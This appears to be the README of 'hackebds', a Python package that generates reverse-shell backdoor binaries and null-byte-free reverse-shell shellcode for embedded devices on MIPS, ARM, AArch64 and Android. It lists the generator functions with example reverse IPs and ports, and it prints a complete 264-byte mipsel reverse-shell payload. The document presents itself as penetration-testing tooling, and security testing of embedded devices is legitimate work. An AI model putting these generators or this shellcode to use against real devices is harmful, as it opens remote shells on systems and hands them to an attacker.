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This tool is used for backdoor and shellcode generation for various architecture devices

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introduction

foreword

In the process of penetration and vulnerability mining of embedded devices, many problems have been encountered. One is that some devices do not have telnetd or ssh services to obtain an interactive shell, and the other is that memory corruption vulnerabilities such as stack overflow are usually Null bytes are truncated, so it is more troublesome to construct reverse_shellcode, so this tool was developed to exploit the vulnerability. This tool is developed based on the PWN module and currently uses the python2 language

fuction

This tool is embedded in the security test of the device. There are two main functions:

  1. Generate backdoor programs of various architectures. The backdoor program is packaged in shellless pure shellcode and is smal in size.Armv5, Armv7, Armv8, mipsel, mips are now supported, and they are still being updated

  2. Generate reverse_shell shellcode of various architectures during the exploit process, and no null bytes, which facilitates the exploitation of memory corruption vulnerabilities on embedded devices. Armv5, Armv7, Armv8, mipsel, mips are now supported, and they are still being updated

install (1) Highly recommended!!Because the source code compilation may not be updated in time,Please install the latest

pip install hackebds==0.0.7

pip install hackebds==0.1.3
....

Instructions for use

When importing this module will import the pwn module

  1. Generate backdoor programs of various architectures, encapsulate pure shellcode, and successfully connect to the shell
>>> from hackebds import *
>>> mipsel_backdoor(reverse_ip,reverse_port)
>>> mips_backdoor(reverse_ip,reverse_port)
>>> aarch64_backdoor(reverse_ip,reverse_port)
>>> armelv5_backdoor(reverse_ip,reverse_port)
>>> armelv7_backdoor(reverse_ip,reverse_port)
>>> armebv5_backdoor(reverse_ip,reverse_port)
>>> armebv7_backdoor(reverse_ip,reverse_port)
>>> mips64_backdoor(reverse_ip,reverse_port)
>>> mips64el_backdoor(reverse_ip,reverse_port)

expample:

>>> mipsel_backdoor("127.0.0.1",5566)
mipsel_backdoor is ok in current path ./
>>> 
  1. Generates the use-back shellcode (no free) null bytes corresponding to various architectures
>>> from hackebds import *
>>> mipsel_reverse_sl(reverse_ip,reverse_port)
>>> mips_reverse_sl(reverse_ip,reverse_port)
>>> aarch64_reverse_sl(reverse_ip,reverse_port)
>>> armelv5_reverse_sl(reverse_ip,reverse_port)
>>> armelv7_reverse_sl(reverse_ip,reverse_port)
>>> armebv5_reverse_sl(reverse_ip,reverse_port)
>>> armebv7_backdoor(reverse_ip,reverse_port)
>>> mips64_reverse_sl(reverse_ip,reverse_port)
>>> mips64el_reverse_sl(reverse_ip,reverse_port)
>>> android_aarch64_backdoor("10.11.28.103",7878)

example:

>>> from hackebds import *
>>> shellcode=mipsel_reverse_sl("127.0.0.1",5566)
[+] No NULL byte shellcode for hex(len is 264):
\xfd\xff\x19\x24\x27\x20\x20\x03\xff\xff\x06\x28\x57\x10\x02\x34\xfc\xff\xa4\xaf\xfc\xff\xa5\x8f\x0c\x01\x01\x01\xfc\xff\xa2\xaf\xfc\xff\xb0\x8f\xea\x41\x19\x3c\xfd\xff\x39\x37\x27\x48\x20\x03\xf8\xff\xa9\xaf\xff\xfe\x19\x3c\x80\xff\x39\x37\x27\x48\x20\x03\xfc\xff\xa9\xaf\xf8\xff\xbd\x27\xfc\xff\xb0\xaf\xfc\xff\xa4\x8f\x20\x28\xa0\x03\xef\xff\x19\x24\x27\x30\x20\x03\x4a\x10\x02\x34\x0c\x01\x01\x01\xf7\xff\x85\x20\xdf\x0f\x02\x24\x0c\x01\x01\x01\xfe\xff\x19\x24\x27\x28\x20\x03\xdf\x0f\x02\x24\x0c\x01\x01\x01\xfd\xff\x19\x24\x27\x28\x20\x03\xdf\x0f\x02\x24\x0c\x01\x01\x01\x69\x6e\x09\x3c\x2f\x62\x29\x35\xf8\xff\xa9\xaf\x97\xff\x19\x3c\xd0\x8c\x39\x37\x27\x48\x20\x03\xfc\xff\xa9\xaf\xf8\xff\xbd\x27\x20\x20\xa0\x03\x69\x6e\x09\x3c\x2f\x62\x29\x35\xf4\xff\xa9\xaf\x97\xff\x19\x3c\xd0\x8c\x39\x37\x27\x48\x20\x03\xf8\xff\xa9\xaf\xfc\xff\xa0\xaf\xf4\xff\xbd\x27\xff\xff\x05\x28\xfc\xff\xa5\xaf\xfc\xff\xbd\x23\xfb\xff\x19\x24\x27\x28\x20\x03\x20\x28\xa5\x03\xfc\xff\xa5\xaf\xfc\xff\xbd\x23\x20\x28\xa0\x03\xff\xff\x06\x28\xab\x0f\x02\x34\x0c\x01\x01\x01

chips and architectures

Tests can leverage chips and architectures

Mips: MIPS 74kc V4.12 big endian MIPS 24kc V5.0 little endian

Armv7: Allwinner(全志)V3s

Armv8: Qualcomm Snapdragon 660

updating

2022.4.19 Added support for aarch64 null-byte reverse_shellcode

2022.4.30 Reduced amount of code using functions and support python3

2022.5.5 0.0.8 version Solved the bug that mips_reverse_sl and mipsel_reverse_sl were not enabled, added mips64_backdoor, mips64_reverse_sl generation and mips64el_backdoor, mips64el_reverse_sl generation

2022.5.21 0.0.9 version changed the generation method of armel V5 backdoor and added the specified generation of riscv-v64 backdoor

2022.6.27 0.1.0 Added Android backdoor generation

One-click build environment

To be added

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